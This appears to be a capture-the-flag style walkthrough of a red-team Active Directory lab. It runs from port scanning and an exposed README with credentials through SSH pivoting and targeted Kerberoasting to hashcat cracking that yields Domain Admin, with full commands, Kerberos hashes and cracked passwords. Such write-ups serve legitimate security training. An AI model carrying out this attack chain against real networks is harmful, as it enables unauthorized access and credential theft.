
In the Stacy’s Office Active Directory Lab, participants take on the role of red teamers, tasked with exploiting a simulated corporate environment. This lab involves an Active Directory setup where users must infiltrate the network, escalate privileges, and gain unauthorized access to sensitive information.
Enumeration
We can start off with a basic Nmap scan and we will notice that port 22 and port 80 are open:
nmap 65.109.81.145 -sV -sC -Pn -p22,80
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-18 23:38 EDT
Nmap scan report for static.145.81.109.65.clients.your-server.de (65.109.81.145)
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 a0b2dc055622709ce0aafdf60a19dcf3 (ECDSA)
|_ 256 199bfcdff0d91d273925b2e3cf7c9a23 (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.58 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.62 seconds
We can take a look around the website and we notice that there is really only a default Ubuntu Apache2 page so we can use FFuF to search for some files that may not be publically available, if you need more information on fuff check out our ffuf cheat cheet.
ffuf -u http://65.109.81.145/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -mc 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://65.109.81.145/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
________________________________________________
README.md [Status: 200, Size: 172, Words: 19, Lines: 12, Duration: 116ms]
Looks like we found a Read Me file that is pretty interesting! The contents of this Read Me file are credentials.
# install jira on this server and connect to ad machine
# ad details
[email protected]
jira:Summer2024!
# local machine
jira:jira
# sysadmin machine
jerrod:Summer2024!!
Initial Foothold
Using the credentials provided in the read me file we can assume that “local machine” is the web server that we have access to. Lets try those credentials now.
Credentials:
- jira:jira
Welcome to Ubuntu 24.04 LTS (GNU/Linux 6.8.0-38-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Mon Aug 19 03:42:48 AM UTC 2024
System load: 0.0 Processes: 151
Usage of /: 10.6% of 47.93GB Users logged in: 1
Memory usage: 13% IPv4 address for ens19: 65.109.81.145
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
43 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Aug 19 03:34:01 2024 from 174.95.43.83
jira@jira-1:~$
Looks like we have our initial foothold! Well, that was easy!
Enumerating our foothold
Now that we have access to the web server let’s take a look around and see what information we can extract, I personally like to take a manual approach before automation, that way I can be sure that I did not miss anything. I like to take the following steps:
- Look for files that are not standard on an Ubuntu System (since we know it is ubuntu)
- Check out Host Files, Passwd Files and look for any SETUID files.
- Run sudo -l to see what we are able to run as our user for
- Check for interesting software that is installed on the machine
- Check network configurations and see if you can contact other host machines
- Run Linpeas and other toolkits that are relevant to the system
Here is what we can find:
Hosts are listed in /etc/hosts file that are interesting, and we may already have the credentials for in the readme since we only use the local machine and we see “stacy.local” and “ws-1” so we can assume that the credentials for “stacy.local” match up with “#ad machine” and “ws-1” match up with “#sys admin machine” We can try that a bit later lets dig deeper.
jira@jira-1:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 jira
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
# ad machines
ws-1 10.20.0.10
stacy.local 10.20.0.9
jira@jira-1:~$
When using the “realm” command we can see information about stacy.local since this is a linux machine you can find more information about this on the Red Hat Linux Blog.
jira@jira-1:~$ realm discover stacy.local
stacy.local
type: kerberos
realm-name: STACY.LOCAL
domain-name: stacy.local
configured: kerberos-member
server-software: active-directory
client-software: sssd
required-package: sssd-tools
required-package: sssd
required-package: libnss-sss
required-package: libpam-sss
required-package: adcli
required-package: samba-common-bin
login-formats: %[email protected]
login-policy: allow-realm-logins
jira@jira-1:~$
(Optionally) We ran a ping sweet which would have yielded the same results as the /etc/hosts file but with less context about what each host system is used for.
for ip in {1..254}; do ping -c 1 10.20.0.$ip | grep "64 bytes" & done | less
64 bytes from 10.20.0.1: icmp_seq=1 ttl=64 time=0.265 ms
64 bytes from 10.20.0.7: icmp_seq=1 ttl=128 time=0.195 ms
64 bytes from 10.20.0.14: icmp_seq=1 ttl=64 time=0.010 ms
64 bytes from 10.20.0.9: icmp_seq=1 ttl=128 time=0.231 ms
64 bytes from 10.20.0.10: icmp_seq=1 ttl=128 time=0.275 ms
Setting up a socks4 proxy for pivoting
We can use SSH to set up a SOCK4 proxy by dynamically forwarding traffic to port 1080. Then use proxy chains to enumerate the other host machines using our local kali system.
ssh -D 1080 [email protected]
The authenticity of host '65.109.81.145 (65.109.81.145)' can't be established.
ED25519 key fingerprint is SHA256:5dTODnJVOaI6dhHCJo0Nf5x1HKbs2FE4XFruQlr71NY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '65.109.81.145' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 24.04 LTS (GNU/Linux 6.8.0-38-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sun Oct 13 05:33:34 PM UTC 2024
System load: 0.0 Processes: 143
Usage of /: 10.6% of 47.93GB Users logged in: 1
Memory usage: 13% IPv4 address for ens19: 65.109.81.145
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
43 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sun Jul 14 17:34:16 2024 from 67.222.245.98
jira@jira-1:~$
Testing our proxy chains configuration:
proxychains nmap 10.20.0.14 -p80,22
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 13:35 EDT
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.20.0.14:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.20.0.14:22 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.20.0.14:80 ... OK
Nmap scan report for 10.20.0.14
Host is up (0.15s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 0.64 seconds
Enumerating other Hosts
Now that we know that our socks proxy is working as designed and we have successfully pivoted onto the 10.20.0.0/24 range we can start enumerating the hosts we found in the /etc/hosts file.
The Proxychains Nmap scan can get very long and verbose it is recommended to output to a results file and grep for open ports like such:
Results of 10.20.0.10:
cat results.txt| grep open
Discovered open port 445/tcp on 10.20.0.10
Discovered open port 135/tcp on 10.20.0.10
Discovered open port 3389/tcp on 10.20.0.10
Discovered open port 139/tcp on 10.20.0.10
Results of 10.20.0.9:
cat results.txt| grep open
Discovered open port 53/tcp on 10.20.0.9
Discovered open port 135/tcp on 10.20.0.9
Discovered open port 445/tcp on 10.20.0.9
Discovered open port 3389/tcp on 10.20.0.9
Discovered open port 139/tcp on 10.20.0.9
Discovered open port 3269/tcp on 10.20.0.9
Foothold #2
Now that we know what ports are open, it is a pain to use Proxychains to interact with hosts in the post exploitation phase so we will use sshuttle to bring the 10.20.0.0/24 range locally:
sshuttle -r [email protected] 10.20.0.0/24
[email protected]'s password:
c : Connected to server.
Because we know that the 10.20.0.10 host has the RDP port open let’s try and use the credentials from the Read me file, we found earlier.
The following credentials work:
- jerrod:Summer2024!!
We now have access to the 10.20.0.10 Host Machine:

Enumerating Foothold 2:
At first glance there is nothing of interest. So, I decided to leave this host alone and move onto the 10.20.0.9 host which I suspected is the Active Directory Domain Controller based on the open ports.

Owning the Domain Controller
The most common active directory attack out there is Kerberoasting because of how easy this is to misconfigure on the domain controller it is often one of the first things a hacker looks at in an AD environment. We will use targetedKerberoast.py and Jerrod’s credentials to authenticate with stacy.local or 10.20.0.9 and we can dump some juicy hashes.
python3 targetedKerberoast.py -v -d "stacy.local" -u "jerrod" -p 'Summer2024!!'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Administrator)
[+] Printing hash for (Administrator)
$krb5tgs$23$*Administrator$STACY.LOCAL$stacy.local/Administrator*$b716aebd43c9a80efcdf3e1b4d597afc$b4c651d4060dcdd23cb7d58209fb394be99120b8e9d6a677df8eec3a5425c093011e32581a721bdcd80b8db17deb317c151d0f2afe6b1b78b2d830aadc847e5846f452be7effdf84bebb043badadc536d3cc4d1cc4bde32fa6933ba27a21fe69a33a9977d5ae14e11e0eddadef688e37afb311e87180ba46989dfd4e2866dc4ebfbdcda2c92a6918e0301c1a4f9c47eb288134ca11477a6c65ffe89c0f8e2c2cf34fbfc4fe5d91a2e81cb20ed4c6f39ef46c775ee502982cf53d1fef463f1eb4344942cbb71c3ba76c5598ec3f8f219f5fca895597fe5d61fe218dcc26a4243db50a1c74a71bbc9a947f0a2a0fee03d1bede52ca078fa67d66a5b10d5b67693d09b014244d25b5fec249899f5d75e233856d11a387d01ab36cb7e46d624ade2799ae1b544b3ab2c44914270bbcdf1cfba565390b05d81afe6c138c9fa1d8bc541e936672571ff3e14811f2256ad2aaed4d97ec5ec6c7069d1e82c79218741bb08243195d32ea4c7462488b37df050c0fd2ab1dddd3e3843a4d44dad312efb7a1c2ef96e6cd690a727eb42e6cee0fb9f32c2c22f99948ba89149ffffd9b1c7f33a2bd15887afdc80e09306a62e51832cca74f5a08d1cc9c16b7bed7e7139b3a7354f01452e2d5303f7735240dbeb2d8362f1850afc968cc5110f6091a5e6c2eab091037b88beb762a243222d61a2ccb917c44e0f1d931781b8937af3f7b1d2bb5b323e740f4be3f29b94d4a516d3927189a515ca97019cd28eb27bcdff70d5d35a29638c998c563fa6493fe071789072bfb83f2f4ed5ea0b528b6c2d66d146e90e0e0460985826b0e188209169324cd1fa1876a5cd6463a78bb06f39a6c7b2a517837ff9471e0e78d987f15af25ec1bcdcbaf24b0a986409827e1c8ba5347efcbef879650e3c0ab79b7685755a4d2cae4bb7a431696fc42ad9e48b26af3ca534f49ddd7d62137fec9139121d2fbbf216a9220f4e755531232f0bb4d0a7c48d1d3c5c864d4a3dd010bb063ca4d84605d82e19c279b0471e2329ee7a69bad8f88b4d456a5e9da53e580cf6de1a80834f2035f662a30111488ebab899cd3c0f57e88d8643f49f7ed6ef4179ddbc8b834cf00be3f0d1c711dc009a91964e8aa0b3e96555b9e01bea4a5d8d88d8fba00944286f79ac462083eea03f9c96db60e6cb0db7e93ba2f08c9f690f5151ecf446b162ae05cce545d193dea64ccabfd2b6ecf0b52d61fca0f7ac8263b9d2153f5100f5291a7703420ce20df844a5da6701ac3787454dd1c9fdec1cfcce332659addb08a08b9647ef939d6ca50b01ca15c6d726be69114b14232f832113d1352bc517afc199d
[VERBOSE] SPN removed successfully for (Administrator)
[VERBOSE] SPN added successfully for (jerrod)
[+] Printing hash for (jerrod)
$krb5tgs$23$*jerrod$STACY.LOCAL$stacy.local/jerrod*$ede016cbcc87da4e5e27a5b86ae60dfb$a2589a44a54c72075b4319002616f3007680a67e070fad295a7eb13b6249a6fa0e90fe6e7d6727e2bfc0a0ff33c67cbe8bc0c46fb59c719b11c7431c1c761fce2b747aa476824066abb62d1d209dfd2b42b2641be18810e379927df14d7466b04d0db9df81f78786aa7df9c02f6a016f06cd436db0f69539c84a5e5a1eab34f878a311d56901b997b5c5c984ea5c129d5687355022e4047722ecd853e2823a9583123b477b0b7ace1a590bfb619de3cc140a878173c6db2fba6746a7e0e15e89c16186d88eeffb1a09ac5c30b1d01acdf03d0d2ee838278ed341dd48bfe39a9871a981d85cc0abc6643a87f4b2f11f1de95d1696b6e39d90c313203b4b83065ea6079eacc488b14f0dddbb0002fa53e2c54f44623004c9d1c03cdfd032e637609aa94cbbc95f2cc4bdb0d9e48b9e3ba2c90f78fa8176c1bec164d9cd2140a5d628e30d577e28b30b6d1862bde98922a997f4330d1d09663518815c373a3991d882b3c3b8745732805bffcade380b7e54dab948ecda04bd8759c6955fdb6d3a8820363807df941fac5e0b767228c513d677e7d02b9cf478831f6c9ae33a94c449a0745515340820f1abf4f1c993de58d8492b5ec5f782fa6bd8f1da52147f78b2da607d39bdd20854c2f1ce3ef43b53550fddf40e94ae61ce6679693efb18f60c61febc2bed577dde30b6f2ae1d86aca4c06144b9beb17dfefb2e3c1dd017241154cc7227efae09d5d90d580759629df8015d5df35d14426465909e678f02dd05d1d71068c759f40271f2020e822c8e599a0eef8f58ad84ea1b1c0bed727b6c41a46a374a82d796c147f5f2e9693fe152e441400ed59e75661f81ac81364c9e783f017bd9a95e44daa7900778c648ea658858e1bede6cae180ae713bfb8bf04b27d4076d43542e7bf2b2beede4f68c73839aba31c6791d5bd6fe4abc51a426460e87ebebe13a18565acb1b007e2c3eba7d9fcdfda8282341064e809c5adc27ddac24bd72e2dfeb14ba8d4ffe82576410e4e2e9964b97f37800963ab4a75eac334d9a53c2efbdcf12ab697949094ab8151b205f540973618abf93476072d8816ceef9435ca42d52a8372ee8d42889d6742f39055f7ee0eaeb218867c2c7a99db8b073973c87ceaa0181b575ffa33a18fb54f90678cce43037819b3381cfcc3e69a0c488644ef2c08902900f122fb1f7e387c6104a4515295240aff198e447dbbfed2990907df4a26947bdfd8ef6bb062491b91faf16f3da064eba50b77643686ada7c38139f67e931fec73c3b48d93c06e37273e4664efff294cb34a9873ef70f5507b4451ad3ad8f04981986e291adc36427d
[VERBOSE] SPN removed successfully for (jerrod)
[VERBOSE] SPN added successfully for (jira)
[+] Printing hash for (jira)
$krb5tgs$23$*jira$STACY.LOCAL$stacy.local/jira*$aa11c9f1e91eafb56a185da993eb1056$fbe52ddae1d290b15cd40db7bd26c2f8c94aac25695855cc92e9b91e2bc3347ab0a954e57f97189662a3a51f085cecd125af7765f863abe5204b18ea2a5ed01ffad931fe037d11ec0ad832aad5b39faa7dcdce2448b906a0460af481ef4efea3b0e237394c661ebc17ac8f6dd354d898b4a871c287fbc37d4d93bbed17514e06a51db5179d5d7f0c0378d4d36bb2abbc8327ee3d1be69c63bce4382e9c318b3c2c42bb708fb0b91ed6e0461f064dfc947b2437f24f258e9c68907f4d92517fb484acbf4785281dbf27f73e43b4333c60a5021d9f689bc99f4b141eda0ffbc29ecf9be72703c6fe201a8cef18afb44671a8de10ee1494eaf6bd02b3a1ee29dd3ec6e004cc8658621ce9b3ff7c5220881d8d2687bc6981243cced7228e05afcbf4fb5972861dd0ba3e13316fd702c0fce66ebe807595b180e83347beb98c5b95e26bde31914f53c88a398c4ac4375bfd678dd8d20a6c5abcf5156609184d3a6ff7f177dce9a618b06f1f3ae005b513515bb8c5bf6625afc420f0eb1290e9c85cc0be3a1f21bbf5d7ed9020e3c3dc3f081915255d473a9d11218e51f573ae0ffd99bf1fc056913d3a1bd5d317d577334ec86708e5e3a909fe42b4a8c0d62ed8b204d0156c276deef60c8334f28c1a13145aeb1890d3e2c01699943f1729bbbc807c15d4e1e9efb7d28861a11aa5335144f526ed4ba4b7a5c617afc381f8f2f0216aa2e3cd400e8351649b502fa8b7c3e6e7cc7095b49266379de90fd6aa8329eeb9ab8d5478ff4dc89423ab98bf75b7577372c483d8f3a0c7d3f3c0dc3ac415194cf873c24f5995ee5512b2c0c658a0bd64fbedb2aa5a2f180f923a4ba6b671b885c8649604125c904d3a8bb51d5c0fc5073a3bd1b1a5029361ef1a178b25f2aa39ce98e06d70281d3788d24e1075a3215e08fea107157269682d49a656c025115efa1b950dd19f3f6f2e64675fbc8ceff976e00d6a597001797daf702e750949670ee0ccb2b019a26453cb15034bbe7cfd48b15ca8cee43cab1a26de185f166134ab64487cb5ff98231e431e99a69f369f639869fdeb536996d5f627c2cb620ceb315c07af7d7496e71fa2ac6b4dd17c062a279c9fb15999ec03a904ca304465784bea0fa9b7eaef33792f5fc23a0afa7291a425bef5d21d9d024c15b066ed8ae7bb87335c634a4618c856ec33aeec70afbbe054e2a00a3ded95fac73fe4c877d55ebe4a5fb156ff2c28d13c8599bc97c0297cd8a90f9d8340c98d804eca48d977de542213686c5ee157c6e1e84978f7c9e8cdb0b4a131c9fd3203926b85e3d1d295191fa3f9668edc6bcaaf63b8c109f0a513
[VERBOSE] SPN removed successfully for (jira)
[VERBOSE] SPN added successfully for (jira-1)
[+] Printing hash for (jira-1)
$krb5tgs$23$*jira-1$STACY.LOCAL$stacy.local/jira-1*$d268733da79c6d7551a9af10862c7d21$6bbaf52c8fa12c32841d65b987c29c55db0e54c005c876c706cd23267c2875399be7f13b63d8aac1a9fef37c3b399ce807d12fd680762e4c452275e6f7b82d07bd80e48953bcc6d1b63774be939536ab652501f18b0b12827aae1a26ca5ed0eff02392a6907209dfbc4a454cd4461ab45382110a1654f10bb823e3bbd16213899c9185027f7e845baafb55c243a2d6a945b5905a60cdae36d91b1bd2236064837d33d645e80e9b96f3396ad428457105fab10a912c36692983e6a828bf0f95aa60cab752b56d56bbd76abb2ce932e55bbf8cf06bdd2412f1d7cb48d47023453dd52883d3b7ab8aca8a84ec1154e06ff09b6df1153a9c29028ce046d56fea84f162251402b4b2d5f97329b80054c8b915be212c18ac3240140cdd364b0345a4570e4a0d4bd46728a5b388cf08af9eded613e9d7f4da48c7fae7af8d929ccdfa5c9346deb9d00952ddceb181d58744b9d4518dea17d7cb585c0b43be9975f46d963a9e97899a5096b9f7c8828f3d8b2536c6fabd688139fe8adb35fcded24c629378c22d4351e6a252d2fa93744d5fb8579cffe7069923518861ba33ffa16cea2d5da88ab66dcd8470555a2dcd4cde4be405a25fc58e2ef36e2583b2d67fbc3456f28823aecca9679b1985372f456c4c025f2dc605442b9fff8c33329c2ea0d02847ec07beef1d042e13202a0d43a8e345a30d176298c798122b79659e8ee8c8bd176ab1cbf5417467b8bf8e2005c78e22d87fefc5818895d28835bf70fedab84f043271c19801cee5c8825ca91be3b8d4c2c08e99b734cdadf618829627f49722166e2320a1527ef68ac2fcd07f906a4e301f496075799ad40cb9b38f56cb937ca0d6ab84db2f61c88645ad37f88da5f0ae159e06267ed245897e7fbd212170eaaf114ac9a96d2cb726f39fcb06491919d5e7f3666e19afeb018bb3cfcd11ef22c61e9646b58fa8156225cf211c632747811d257f94948e697b74af30afd0a94bf48dc4f6faf91b8e6bcb2b0087dc3ba0a0e3095695f68cbd81a2d518af69795781ccddbdef33e78b99dd7ed858df97d7db8c9e45018a1111d40f2957c67adf80242f0d09132668b62daa8982b36755d65f7efb4a9e6c7a998cb941565bf018c9e21b6893353cee65aa7b906cb787840b2149bb761468d291fe168b5a9e7f86447a54a70f7c9f333607021d81ae787f24fbba36d6d57fbf96f3e40b26d22029af4431fc7638fc81a451b6b404a7ef1762dc3e98c4b95cd94b9fdcdf1d6fd5147a9c5da6aa120f816f1d8f49fb51ebe890d1ab9f1891c48861df6f7f4697a9a40950e98924015492fa153b329c4a77c59d0d66
[VERBOSE] SPN removed successfully for (jira-1)
[VERBOSE] SPN added successfully for (stacy)
[+] Printing hash for (stacy)
$krb5tgs$23$*stacy$STACY.LOCAL$stacy.local/stacy*$deb10b1e5b38156d9bfb49b8635d3c1e$0b3939804de33513db9163bea3422e4468e718a14019ba8deb40ed821f04efc49ceb9582e7a5abbd74251288ab1d9f644a776ab4ff18dc471ed3248e698fc080924cff2201e90734e7440b778c86c56ff84facb04e717313e7499f38068c40ecce561b180ddbad98592525914d71f7e43a7d04ab73801eebae82a7d744153b061b6b1c397e1a7fe5f342f806f25f00116564724d9e81a83ca2a5c3717abf2126361ba1bea6ef6225a262adb5516e8c26e24e9ef9d446aeca1cb4456fa5dba54c1ee5507c3e6eef52d15509efcc50dcde88980b707812fc307d892070a6f81b0f5674cc543eb7ecae2d2e17bb53a2a2953385b61e6eb83758d83bf2ad6826e45cf74a3a637d607d20b876f475b8b7e64e934611a1fbf3bcd9770275a2ef7e9fcda6d46afa793780b28c029d9afec14ba0c872a9c093621a95aee6bc970054dc14c0708d12af116b0fe4bbe2ddcebe2e0b9fb0e399f555fb8c05aee01ea513639c5f32a0e4b21933ee9f8c43babbf1b7bfe13124830e8fe1c52bd3978e8e5da0789dffdd24796b08d4d36286749627b0676b20160e6f3c4a242c3ec6b0dfd083bd2f992b2e3bb713baff374db1c91e3ae3d82d76ec5978f636fe958c57690163a14cd47a5d4f4772256d71634bede76b73e89b070a1978f4afc0db8856f21eeb0f2bbc46c9d82b8bec6a5ce14d9f2e2831fa59065131fc2299f30b4f96f2e96c8b1660c5c95a181ce69d613fe23a68660aed62100d5f44c7a850e87a01941b39c6fd912cc55bc42215054ca6c7316b2be14d23dd8eb011fc5f96dc0200428466553795395c46368800f9ac643220d48ed3b74f1ccf471f67d23f93c38535449786618f3400e771e64495a2248f52ef8c8d817dd608f7e70ab4f5dcb8c7e17f850d3b5eb8c41b209afe2fb1d07993b71b0b3ae54c19275d474f595af771431da05697d9f19dc48538d592a958180677739b8277c343906ce4ef0138f30ba781ee0ea9490bab520fce5c0ffd540648b74899af312abbb1bbfdb5f9274d437b65f3fcf15be1d4bcef9505968938068abdf14fbc4c4ec40157502cd15e0d9e62b48729f841562991dad4ab6320dffe760ea05a630cf0851c2ad26bc86c1879524e553876faf320d4a7ae33a5a1542822b511e08348d04a779d56bb4842181f381839757ddbfdea52fc2d0106ce6e0af6fe16fa4c3d2b8300a34dae07c26803ab8605bf764c76abaed6633f62a263e4d78b0895c9a68de0de9114d3a40e91988b75d7229643d0f7cc446e59bc2fdcdb9f3807a91523eb8c5660e300bd994335f4b4f49e3485654b00aa873688a7b20fe85fed3677f0
[VERBOSE] SPN removed successfully for (stacy)
Cracking the hashes
We can crack the hashes with hashcat and a password file.
hashcat -m 13100 hash-krb.txt pass.txt -O --force --potfile-disable
We have cracked two hashes, Administrator and Stacy.
$krb5tgs$23$*Administrator$STACY.LOCAL$stacy.local/Administrator*$b716aebd43c9a80efcdf3e1b4d597afc$b4c651d4060dcdd23cb7d58209fb394be99120b8e9d6a677df8eec3a5425c093011e32581a721bdcd80b8db17deb317c151d0f2afe6b1b78b2d830aadc847e5846f452be7effdf84bebb043badadc536d3cc4d1cc4bde32fa6933ba27a21fe69a33a9977d5ae14e11e0eddadef688e37afb311e87180ba46989dfd4e2866dc4ebfbdcda2c92a6918e0301c1a4f9c47eb288134ca11477a6c65ffe89c0f8e2c2cf34fbfc4fe5d91a2e81cb20ed4c6f39ef46c775ee502982cf53d1fef463f1eb4344942cbb71c3ba76c5598ec3f8f219f5fca895597fe5d61fe218dcc26a4243db50a1c74a71bbc9a947f0a2a0fee03d1bede52ca078fa67d66a5b10d5b67693d09b014244d25b5fec249899f5d75e233856d11a387d01ab36cb7e46d624ade2799ae1b544b3ab2c44914270bbcdf1cfba565390b05d81afe6c138c9fa1d8bc541e936672571ff3e14811f2256ad2aaed4d97ec5ec6c7069d1e82c79218741bb08243195d32ea4c7462488b37df050c0fd2ab1dddd3e3843a4d44dad312efb7a1c2ef96e6cd690a727eb42e6cee0fb9f32c2c22f99948ba89149ffffd9b1c7f33a2bd15887afdc80e09306a62e51832cca74f5a08d1cc9c16b7bed7e7139b3a7354f01452e2d5303f7735240dbeb2d8362f1850afc968cc5110f6091a5e6c2eab091037b88beb762a243222d61a2ccb917c44e0f1d931781b8937af3f7b1d2bb5b323e740f4be3f29b94d4a516d3927189a515ca97019cd28eb27bcdff70d5d35a29638c998c563fa6493fe071789072bfb83f2f4ed5ea0b528b6c2d66d146e90e0e0460985826b0e188209169324cd1fa1876a5cd6463a78bb06f39a6c7b2a517837ff9471e0e78d987f15af25ec1bcdcbaf24b0a986409827e1c8ba5347efcbef879650e3c0ab79b7685755a4d2cae4bb7a431696fc42ad9e48b26af3ca534f49ddd7d62137fec9139121d2fbbf216a9220f4e755531232f0bb4d0a7c48d1d3c5c864d4a3dd010bb063ca4d84605d82e19c279b0471e2329ee7a69bad8f88b4d456a5e9da53e580cf6de1a80834f2035f662a30111488ebab899cd3c0f57e88d8643f49f7ed6ef4179ddbc8b834cf00be3f0d1c711dc009a91964e8aa0b3e96555b9e01bea4a5d8d88d8fba00944286f79ac462083eea03f9c96db60e6cb0db7e93ba2f08c9f690f5151ecf446b162ae05cce545d193dea64ccabfd2b6ecf0b52d61fca0f7ac8263b9d2153f5100f5291a7703420ce20df844a5da6701ac3787454dd1c9fdec1cfcce332659addb08a08b9647ef939d6ca50b01ca15c6d726be69114b14232f832113d1352bc517afc199d:Summer2024!
$krb5tgs$23$*stacy$STACY.LOCAL$stacy.local/stacy*$deb10b1e5b38156d9bfb49b8635d3c1e$0b3939804de33513db9163bea3422e4468e718a14019ba8deb40ed821f04efc49ceb9582e7a5abbd74251288ab1d9f644a776ab4ff18dc471ed3248e698fc080924cff2201e90734e7440b778c86c56ff84facb04e717313e7499f38068c40ecce561b180ddbad98592525914d71f7e43a7d04ab73801eebae82a7d744153b061b6b1c397e1a7fe5f342f806f25f00116564724d9e81a83ca2a5c3717abf2126361ba1bea6ef6225a262adb5516e8c26e24e9ef9d446aeca1cb4456fa5dba54c1ee5507c3e6eef52d15509efcc50dcde88980b707812fc307d892070a6f81b0f5674cc543eb7ecae2d2e17bb53a2a2953385b61e6eb83758d83bf2ad6826e45cf74a3a637d607d20b876f475b8b7e64e934611a1fbf3bcd9770275a2ef7e9fcda6d46afa793780b28c029d9afec14ba0c872a9c093621a95aee6bc970054dc14c0708d12af116b0fe4bbe2ddcebe2e0b9fb0e399f555fb8c05aee01ea513639c5f32a0e4b21933ee9f8c43babbf1b7bfe13124830e8fe1c52bd3978e8e5da0789dffdd24796b08d4d36286749627b0676b20160e6f3c4a242c3ec6b0dfd083bd2f992b2e3bb713baff374db1c91e3ae3d82d76ec5978f636fe958c57690163a14cd47a5d4f4772256d71634bede76b73e89b070a1978f4afc0db8856f21eeb0f2bbc46c9d82b8bec6a5ce14d9f2e2831fa59065131fc2299f30b4f96f2e96c8b1660c5c95a181ce69d613fe23a68660aed62100d5f44c7a850e87a01941b39c6fd912cc55bc42215054ca6c7316b2be14d23dd8eb011fc5f96dc0200428466553795395c46368800f9ac643220d48ed3b74f1ccf471f67d23f93c38535449786618f3400e771e64495a2248f52ef8c8d817dd608f7e70ab4f5dcb8c7e17f850d3b5eb8c41b209afe2fb1d07993b71b0b3ae54c19275d474f595af771431da05697d9f19dc48538d592a958180677739b8277c343906ce4ef0138f30ba781ee0ea9490bab520fce5c0ffd540648b74899af312abbb1bbfdb5f9274d437b65f3fcf15be1d4bcef9505968938068abdf14fbc4c4ec40157502cd15e0d9e62b48729f841562991dad4ab6320dffe760ea05a630cf0851c2ad26bc86c1879524e553876faf320d4a7ae33a5a1542822b511e08348d04a779d56bb4842181f381839757ddbfdea52fc2d0106ce6e0af6fe16fa4c3d2b8300a34dae07c26803ab8605bf764c76abaed6633f62a263e4d78b0895c9a68de0de9114d3a40e91988b75d7229643d0f7cc446e59bc2fdcdb9f3807a91523eb8c5660e300bd994335f4b4f49e3485654b00aa873688a7b20fe85fed3677f0:amazing.07
Pwned Active Directory Environment
By cracking these hashes, we now have access to Domain Admin and Stacy on 10.20.0.9


This lab machine is now completed! If you liked this article, please consider leaving a comment.
Leave a Reply